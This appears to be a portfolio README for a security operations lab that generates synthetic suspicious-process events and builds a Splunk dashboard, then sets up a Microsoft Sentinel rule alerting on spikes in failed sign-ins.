Watch the video <-- WATCH ME BUILD IT!
This lab demonstrates a practical SOC workflow using Splunk and Microsoft Sentinel.
In Splunk, synthetic process activity (like PowerShell commands and malware-style downloads) is generated and visualized on a KPI dashboard.
In Microsoft Sentinel, a scheduled analytic alert is created to detect spikes in failed sign-ins, simulating a common brute-force scenario.
This project highlights end-to-end SIEM ingestion, detection, and alerting, showcasing hands-on log analysis, KQL, dashboards, and automated alert rules.
- SIEM: Microsoft Sentinel, Splunk
- Cloud: Azure Portal & Log Analytics
- Security & Detection: KQL, automated analytic alerts
- Operating Systems: Windows 11
-
Splunk Synthetic Event Generation
- Simulate suspicious process activity (encoded PowerShell, malware-style downloads).
- Filter and aggregate events using SPL queries.
- Visualize total detections as a KPI panel on a dashboard.
-
Dashboard Setup in Splunk
- Create a dashboard panel titled โSuspicious Execution Overview.โ
- Pin panel to a SOC-style dashboard for ongoing monitoring.
-
Microsoft Sentinel Analytic Rule
- Query authentication logs for failed sign-ins using KQL.
- Create a scheduled analytic rule (runs every 10 minutes) to trigger alerts for excessive failed login attempts.
- Verify alert rule activation and ensure automated detection works as intended.
- Log analysis and detection in Splunk
- KQL query writing and log analytics in Microsoft Sentinel
- Scheduled alert creation and SOC-style workflow implementation
- Dashboard visualization for real-time monitoring